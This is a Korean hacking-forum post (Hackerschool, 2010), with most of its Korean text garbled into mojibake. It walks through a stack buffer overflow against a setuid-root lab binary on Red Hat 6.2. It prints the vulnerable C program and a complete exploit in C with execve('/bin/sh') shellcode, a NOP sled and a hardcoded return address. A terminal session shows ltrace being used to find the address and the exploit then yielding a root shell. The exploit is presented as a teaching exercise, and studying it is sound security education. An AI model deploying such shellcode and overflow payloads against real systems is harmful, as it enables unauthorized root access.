1581, 7/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1437 [º¹»ç]


À̹ø°­Á´ º°·Î ¶æÀº ¾ø½À´Ï´Ù.
´©±¸µçÁö 1ºÐ¸¸ »ý°¢Çϸé ©¼öÀÖ´Â ÀͽºÇ÷ÎÀÕÀÔ´Ï´Ù .
Á¦°¡ ÀÚÀ¯°­Á½ǿ¡ ¿Ã¸®´Â ÀÌÀ¯´Â .. !
'º°ºûÀ»´ã¾Æ'´ÔÀÇ °­Á¸¦ °ßÁ¦Çϱâ À§Çؼ­ .. !!!! ÀÔ´Ï´Ù .¤»¤»¤»¤»

Àü¿¡ Á¦ Ƽ½ºÅ丮¿¡ ¿Ã·È¾úÁö¸¸ À߸øµÈÁ¡ÀÌ ÀÖ¾î ¼öÁ¤ÇÑ°ÍÀ» ´Ù½Ã ¿Ã¸³´Ï´Ù .!

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0smp on an i686
login: buff3r
Password:
Last login: Sat Mar  6 19:26:44 from 192.168.0.3
[buff3r@testserver buff3r]$ ls -al
total 36
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 .
drwxr-xr-x    7 root     root         4096 Mar  6 18:54 ..
-rw-------    1 buff3r   buff3r       1239 Mar  6 19:30 .bash_history
-rw-r--r--    1 buff3r   buff3r         24 Mar  6 18:54 .bash_logout
-rw-r--r--    1 buff3r   buff3r        230 Mar  6 18:54 .bash_profile
-rw-r--r--    1 buff3r   buff3r        124 Mar  6 18:54 .bashrc
-rwxr-xr-x    1 buff3r   buff3r        333 Mar  6 18:54 .emacs
-rw-r--r--    1 buff3r   buff3r       3394 Mar  6 18:54 .screenrc
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 exploits
[buff3r@testserver buff3r]$ cd exploits/
[buff3r@testserver exploits]$ ls -al
total 28
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 .
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 ..
-rw-rw-r--    1 buff3r   buff3r        852 Mar  6 19:27 exploit.c
-rwsr-xr-x    1 root     root        11750 Mar  6 19:14 vuln
-rw-r--r--    1 root     root          109 Mar  6 19:14 vuln.c
[buff3r@testserver exploits]$ cat vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]);
return ;
}
[buff3r@testserver exploits]$ cat exploit.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0; // ¿ì¸®´Â ¾ÆÁ÷ ret ÀÇ °ªÀ» ¸ð¸¨´Ï´Ù.
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; }
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    
        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);
        free(buffer);
        return 0;
}
[buff3r@testserver exploits]$ cp vuln buff
[buff3r@testserver exploits]$ ltrace ./buff `perl -e 'print "\x41"x600'`
__libc_start_main(0x080483d0, 2, 0xbffff944, 0x08048298, 0x0804842c <unfinished ...>
__register_frame_info(0x0804945c, 0x08049530, 0xbffff904, 0x080482bd, 0x401081ec) = 0x40108d40
strcpy(0xbffff704, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff704
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[buff3r@testserver exploits]$ vi exploit.c
[buff3r@testserver exploits]$ gcc exploit.c -o exploit
[buff3r@testserver exploits]$ /bin/bash2
[buff3r@testserver exploits]$ ./exploit
bash# id
uid=0(root) gid=501(buff3r) groups=501(buff3r)

·çÆ® ±ÇÇÑÀ» ¾ò¾î³¾¼öÀÖ´Ù .
Áß¿äºÎºÐ¸¸ º¸µµ·Ï ÇÏÀÚ
vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500]; // 500Å©±âÀÇ ¹öÆÛ¸¦ ¼±¾ðÇÑ´Ù

// Stack Status : [BUFFER (500byte)][SFP (4btye)[RET (4byte)]
strcpy(buffer,argv[1]);
return ;
}

exploit.c
¿ø·¡ get_esp °°Àº ÀζóÀÎ ¾î¼Àºí¸® ÇÔ¼ö¸¦ ¼±¾ðÇÑÈÄ ¿ÀÇÁ¼ÂÀ» Âï¾îº¸´Â°ÍÀÌ ÀϹÝÀûÀÎ °ø°Ü¹ýÀÌÁö¸¸ redhat 6.2 ¿¡¼­´Â random stackÀÌ Àû¿ëÀÌ ¾ÈµÇ¹Ç·Î ±×³É Á¤È®ÇÑ ÁÖ¼Ò°ªÀ» ¾ò¾î³¾¼öÀÖÀ¸¹Ç·Î offsetÀÌ ÇÊ¿ä¾ø´Ù.
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff704; // ¾Æ±î ltrace ¸¦ ÅëÇØ strcpy °¡ ¾î¶² À§Ä¡¿¡ argv[1]À» º¹»çÇÏ´ÂÁö
                             // ¾Ë¾Æ³Â´Ù ±× °ªÀ» ÀÌ¿ëÇÏÀÚ
        buffer = malloc(600); // °ø°Ý½ºÅÃÀ» ±¸¼ºÇϱâ À§ÇÑ ÇÒ´ç
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; } // óÀ½ 600 ¹ÙÀÌÆ®¸¦ ¸ðµÎ ret·Î ä¿î´Ù (0xbffff704)
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; } // óÀ½ 200 ¹ÙÀÌÆ®¸¦ ¸ðµÎ NOPÀ¸·Î ä¿î´Ù.
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    // óÀ½ + 200 ºÎÅÍ ½©Äڵ带 ³öµÐ´Ù.(NOPµÚ¿¡³öµÐ´Ù.)
        buffer[600-1] = 0;        // ¸Ç³¡À» 0À¸·Î ³¡³½´Ù
        execl("./vuln", "vuln", buffer, 0); // ¿ì¸®°¡ ¸¸µç °ø°Ý ¹öÆÛ¸¦ vuln ÀÇ ÀÎÀÚ·Î

                              // ÁÖ°í vuln À» ½ÇÇàÇÑ´Ù.  
        free(buffer);
        return 0;
}

  Hit : 13255     Date : 2010/03/17 07:51



    
º°ºûÀ»´ã¾Æ ...Çß´ø¸» Ãë¼Ò 2010/03/17  
º°ºûÀ»´ã¾Æ ³» ¾ÕÀ» °¡·Î¸·´Ù´Ï... 2010/03/17  
¼Ò¿ï ³ªº¸´ÙÇÑ»ì¾î¸®´Ù´Ï.. 2010/03/17  
Myers BOF¸Å´Ï¾Æ Buff3r... NOP½ä¸ÅÀΰϹÌ? 2010/03/17  
Aentanis ¸ÓÁö;; 2010/05/23  
Cpgroot .. 2010/08/18  
1461   Linux Root Æнº¿öµå ºÐ½Ç½Ã Á¶Ä¡ ¹æ¹ý[9]     h41d35
09/10 13773
1460   ÇãÁ¢ÇÑ °¨È¸ - VI     err0r2
02/20 13763
1459   [ÀÚÀÛ]¹«Â÷º° ´ëÀÔ°ø°Ý(brute force attack)°­Á 1     h@cking2013
01/24 13716
1458   [ÀÚÀÛ]¹éÆ®·¢ 4 R1, À©7 ¸ÖƼºÎÆà (+ ÇѱÛÈ­+grub¼³Á¤)[4]     williamlee
11/20 13682
1457   [°­Ãß] ÇØÅ· °ü·Ã ¿©·¯°¡Áö »çÀÌÆ®[5]     6Moderato
09/04 13648
1456   [ÀÚÀÛ] °øÀ¯±â¾²´Â Áý¿¡¼­ ¼­¹öµ¹¸®±â / dmz¼³Á¤[4]     ÇÁ¶óÀ̵å
08/11 13586
1455   ½ÅÇü Áß±¹¹ß ³×ÀÌÆ®¿Â ÇØÅ· ºÐ¼®[12]     Ǫ¸¥ÇÏ´Ã
02/12 13565
1454   À©µµ¿ì ½Ã½ºÅÛÀÇ ÄÄÇ»ÅÍ¿¡¼­ ¸®´ª½º ¼³Ä¡¹æ¹ý[15]     o-0_o-0
09/19 13552
1453   C¾ð¾î¿¡¼­ »ç¿ëµÇ´Â Ư¼ö¹®ÀÚ/¼­½Ä¹®ÀÚ[5]     xodnr631
08/18 13466
1452   * ÇØÅ·ÀÇ °ø°Ý±â¼ú *[3]     HackerMapia
03/01 13462
1451   °­ÁÂÇϳª. µð·ºÅ丮 ³ëÃâ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ ÇØÅ·[5]     whqkdnf000
09/05 13401
1450   ¸®´ª½º¿¡¼­ ½ºÅ¸Å©·¡ÇÁÆ®¸¦ ÇÑ´Ù?[9]     jonginsir
02/08 13399
1449   (2Â÷¼öÁ¤)´Ü¼øÇÏ°í À§ÇèÇÑ ÆÄÀÏ ¾÷·Îµå ÇØÅ·±â¼ú[2]     gohy032
07/30 13386
1448   OSI 7°èÃþ°ú TCP/IP°èÃþ      gnsehfvlr
05/06 13385
1447   ¹éÆ®·¢ÀÇÁ¤¼® Á¦2-1°­[5]     ÀÎõÇØÄ¿
01/21 13372
1446   ¾î¼Àºí¸®¾î °­Á 1Æí[1]     asdzxc301
12/13 13341
1445   ÇØÅ·¹æ¹ý[12]     bongcheur
07/07 13288
1444   [ÀÚÀÛÈĸµÅ©]KSSN ´Ù½Ã ¾¹´Ï´Ù (Á¦´ë·Î)[1]     ÃÊÄÝ·¿³ªÀÎ
03/07 13279
  [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â[6]     buff3r
03/17 13254
1442   ÀÓº£µðµå ¸®´ª½º °øºÎ¹æ¹ý[6]     hansu9
08/22 13229
[1][2][3][4][5][6] 7 [8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org